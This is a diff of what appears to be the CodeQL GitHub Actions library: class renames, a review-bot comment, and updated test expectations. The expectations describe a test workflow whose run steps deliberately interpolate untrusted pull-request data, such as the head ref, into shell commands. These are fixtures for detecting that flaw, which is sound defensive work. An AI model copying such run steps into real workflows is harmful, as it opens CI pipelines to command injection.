@@ -32,14 +32,14 @@ class LabelCheck extends If { } } -from Workflow w, Job job, StepUses checkoutStep +from Workflow w, Job job, UsesStep checkoutStep where w.hasTriggerEvent("pull_request_target") and w.getAJob() = job and job.getAStep() = checkoutStep and checkoutStep.getCallee() = "actions/checkout" and checkoutStep - .getArgumentExpr("ref") + .getArgument("ref") .(Expression) .getExpression() .matches([ diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index ffbbed2bac1..4d290a90604 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
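Review bot: `checkoutStep.getCallee() = "actions/checkout"` is an exact, case-sensitive comparison, whereas the `getGitHubRepository()` predicate deleted earlier in this patch lower-cased the `owner/repo` part before returning it. `getCallee()` is defined outside this hunk; if it does not normalise case, a workflow that spells the action name with different capitalisation would not be reported, since repository names resolve case-insensitively on GitHub. Comparing `checkoutStep.getCallee().toLowerCase() = "actions/checkout"` makes the check independent of how `getCallee()` is implemented. The `where` clause continues past the end of this hunk.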
@@ -71,156 +71,179 @@ yamlNodes | .github/workflows/test.yml:40:9:40:11 | run | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | jobNodes -| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | stepNodes -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | allUsesNodes -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | stepUsesNodes -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... 
d files | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | jobUsesNodes +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | usesSteps -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | source | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | runSteps -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | ${{ github.event.pull_request.head.ref }} | -| .github/workflows/test.yml:39:9:40:53 | id: sink | echo ${{needs.job1.outputs.job_output}} | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | runStepChildren -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:9:26:10 | id | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:27:9:27:11 | run | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${ ... 
iles }} | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:28:9:28:10 | id | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:29:9:29:11 | run | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | -| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:9:39:10 | id | -| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:13:39:16 | sink | -| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:9:40:11 | run | -| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:26:10 | id | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:9:27:11 | run | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:28:10 | id | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:9:29:11 | run | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ git ... 
.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:39:10 | id | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:9:40:11 | run | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | parentNodes | .github/workflows/test.yml:1:1:1:2 | on | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:1:5:1:8 | push | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:3:1:3:4 | jobs | .github/workflows/test.yml:1:1:40:53 | on: push | | .github/workflows/test.yml:4:3:4:6 | job1 | .github/workflows/test.yml:4:3:40:53 | job1: | | .github/workflows/test.yml:4:3:40:53 | job1: | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:5:11 | runs-on | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | .github/workflows/test.yml:4:3:40:53 | job1: | -| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:7:5:7:11 | outputs | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:8:7:8:16 | job_output | .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | -| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | -| .github/workflows/test.yml:10:5:10:9 | steps | .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | .github/workflows/test.yml:5:5:31:2 | runs-on ... 
-latest | -| .github/workflows/test.yml:11:9:11:12 | uses | .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | -| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:12:9:12:12 | with | .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:5:5:5:11 | runs-on | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:5:14:5:26 | ubuntu-latest | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:7:5:7:11 | outputs | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:8:16 | job_output | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:10:5:10:9 | steps | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:11:9:11:12 | uses | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:7:31:2 | - uses: ... 
kout@v4 | +| .github/workflows/test.yml:11:15:11:33 | actions/checkout@v4 | .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:12:9:12:12 | with | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:13:11:13:21 | fetch-depth | .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | -| .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | +| .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | .github/workflows/test.yml:11:9:15:6 | Uses Step | | .github/workflows/test.yml:13:24:13:24 | 0 | .github/workflows/test.yml:13:11:15:6 | fetch-depth: 0 | -| .github/workflows/test.yml:15:9:15:12 | name | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | -| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:16:9:16:10 | id | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:17:9:17:12 | uses | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:17:15:17:42 | tj-acti ... les@v40 | .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:19:9:19:12 | name | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | -| .github/workflows/test.yml:19:15:19:43 | Remove ... d files | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:20:9:20:10 | id | .github/workflows/test.yml:19:9:26:6 | name: R ... 
d files | -| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:21:9:21:12 | uses | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:21:15:21:55 | mad9000 ... tring@3 | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | -| .github/workflows/test.yml:22:9:22:12 | with | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:15:9:15:12 | name | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:15:15:15:31 | Get changed files | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:16:9:16:10 | id | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:16:13:16:18 | source | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:17:9:17:12 | uses | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:17:15:17:42 | tj-acti ... les@v40 | .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:19:12 | name | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:19:15:19:43 | Remove ... 
d files | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:20:9:20:10 | id | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:20:13:20:16 | step | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:21:9:21:12 | uses | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:21:15:21:55 | mad9000 ... tring@3 | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:22:9:22:12 | with | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:23:11:23:16 | source | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | | .github/workflows/test.yml:24:11:24:14 | find | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | | .github/workflows/test.yml:24:17:24:21 | "foo" | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | | .github/workflows/test.yml:25:11:25:17 | replace | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | | .github/workflows/test.yml:25:20:25:21 | "" | .github/workflows/test.yml:23:11:26:6 | source: ... iles }} | -| .github/workflows/test.yml:26:9:26:10 | id | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:11:7:31:2 | - uses: ... 
kout@v4 | -| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:27:9:27:11 | run | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | -| .github/workflows/test.yml:28:9:28:10 | id | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | -| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:29:9:29:11 | run | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | -| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:26:9:26:10 | id | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:11:7:31:2 | - uses: ... kout@v4 | +| .github/workflows/test.yml:26:13:26:23 | simplesink1 | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:9:27:11 | run | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:28:9:28:10 | id | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:11:7:31:2 | - uses: ... 
kout@v4 | +| .github/workflows/test.yml:28:13:28:23 | simplesink2 | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:9:29:11 | run | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:31:3:31:6 | job2 | .github/workflows/test.yml:4:3:40:53 | job1: | -| .github/workflows/test.yml:32:5:32:11 | runs-on | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | .github/workflows/test.yml:4:3:40:53 | job1: | -| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:34:5:34:6 | if | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:36:5:36:9 | needs | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:38:5:38:9 | steps | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:39:7:40:53 | - id: sink | .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:39:9:39:10 | id | .github/workflows/test.yml:39:9:40:53 | id: sink | -| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:7:40:53 | - id: sink | -| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | id: sink | -| .github/workflows/test.yml:40:9:40:11 | run | .github/workflows/test.yml:39:9:40:53 | id: sink | -| .github/workflows/test.yml:40:14:40:52 | echo ${ ... 
utput}} | .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:32:5:32:11 | runs-on | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | .github/workflows/test.yml:4:3:40:53 | job1: | +| .github/workflows/test.yml:32:14:32:26 | ubuntu-latest | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:5:34:6 | if | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:34:9:34:23 | ${{ always() }} | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:5:36:9 | needs | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:36:12:36:15 | job1 | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:38:5:38:9 | steps | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:7:40:53 | - id: sink | .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:39:10 | id | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:7:40:53 | - id: sink | +| .github/workflows/test.yml:39:13:39:16 | sink | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:9:40:11 | run | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | .github/workflows/test.yml:39:9:40:53 | Run Step: sink | cfgNodes -dfNodes -exprNodes | .github/workflows/test.yml:1:1:40:53 | enter on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push | | .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | | .github/workflows/test.yml:1:1:40:53 | on: push | -| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | -| .github/workflows/test.yml:8:7:10:4 | job_out ... 
alue }} | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | +| .github/workflows/test.yml:24:17:24:21 | "foo" | +| .github/workflows/test.yml:25:20:25:21 | "" | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | -| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | -| .github/workflows/test.yml:39:9:40:53 | id: sink | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +dfNodes +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... 
iles }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +| .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | +exprNodes +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | +| .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | argumentNodes | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | usesIds -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | source | -| .github/workflows/test.yml:19:9:26:6 | name: R ... 
d files | step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | step | nodeLocations -| .github/workflows/test.yml:1:1:40:53 | enter on: push | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | -| .github/workflows/test.yml:1:1:40:53 | exit on: push | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | -| .github/workflows/test.yml:1:1:40:53 | exit on: push (normal) | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | -| .github/workflows/test.yml:1:1:40:53 | on: push | .github/workflows/test.yml:1:1:40:53 | .github/workflows/test.yml@1:1:40:53 | -| .github/workflows/test.yml:5:5:31:2 | runs-on ... -latest | .github/workflows/test.yml:5:5:31:2 | .github/workflows/test.yml@5:5:31:2 | -| .github/workflows/test.yml:8:7:10:4 | job_out ... alue }} | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | +| .github/workflows/test.yml:8:7:10:4 | Job outputs node | .github/workflows/test.yml:8:7:10:4 | .github/workflows/test.yml@8:7:10:4 | | .github/workflows/test.yml:8:19:8:49 | ${{ ste ... alue }} | .github/workflows/test.yml:8:19:8:49 | .github/workflows/test.yml@8:19:8:49 | -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | -| .github/workflows/test.yml:19:9:26:6 | name: R ... 
d files | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | .github/workflows/test.yml:11:9:15:6 | .github/workflows/test.yml@11:9:15:6 | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | .github/workflows/test.yml:15:9:19:6 | .github/workflows/test.yml@15:9:19:6 | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | .github/workflows/test.yml:19:9:26:6 | .github/workflows/test.yml@19:9:26:6 | | .github/workflows/test.yml:23:19:23:63 | ${{ ste ... iles }} | .github/workflows/test.yml:23:19:23:63 | .github/workflows/test.yml@23:19:23:63 | -| .github/workflows/test.yml:26:9:28:6 | id: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:9:28:6 | .github/workflows/test.yml@26:9:28:6 | | .github/workflows/test.yml:27:14:27:63 | echo ${ ... iles }} | .github/workflows/test.yml:27:14:27:63 | .github/workflows/test.yml@27:14:27:63 | -| .github/workflows/test.yml:28:9:31:2 | id: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:9:31:2 | .github/workflows/test.yml@28:9:31:2 | | .github/workflows/test.yml:29:14:29:54 | ${{ git ... .ref }} | .github/workflows/test.yml:29:14:29:54 | .github/workflows/test.yml@29:14:29:54 | -| .github/workflows/test.yml:32:5:40:53 | runs-on ... -latest | .github/workflows/test.yml:32:5:40:53 | .github/workflows/test.yml@32:5:40:53 | -| .github/workflows/test.yml:39:9:40:53 | id: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:9:40:53 | .github/workflows/test.yml@39:9:40:53 | | .github/workflows/test.yml:40:14:40:52 | echo ${ ... 
utput}} | .github/workflows/test.yml:40:14:40:52 | .github/workflows/test.yml@40:14:40:52 | scopes | .github/workflows/test.yml:1:1:40:53 | on: push | @@ -322,8 +345,8 @@ summaries | timheuer/base64-to-file | * | input.fileDir | output.filePath | taint | | timheuer/base64-to-file | * | input.fileName | output.filePath | taint | calls -| .github/workflows/test.yml:11:9:15:6 | uses: a ... kout@v4 | actions/checkout | -| .github/workflows/test.yml:15:9:19:6 | name: G ... d files | tj-actions/changed-files | -| .github/workflows/test.yml:19:9:26:6 | name: R ... d files | mad9000/actions-find-and-replace-string | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | actions/checkout | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | tj-actions/changed-files | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | mad9000/actions-find-and-replace-string | needs | .github/workflows/test.yml:40:14:40:52 | echo ${ ... utput}} | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index abdd087590a..f30db9af92f 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -1,4 +1,4 @@ -import codeql.actions.ast.internal.Actions +import codeql.actions.ast.internal.Yaml import codeql.actions.Ast import codeql.actions.Cfg 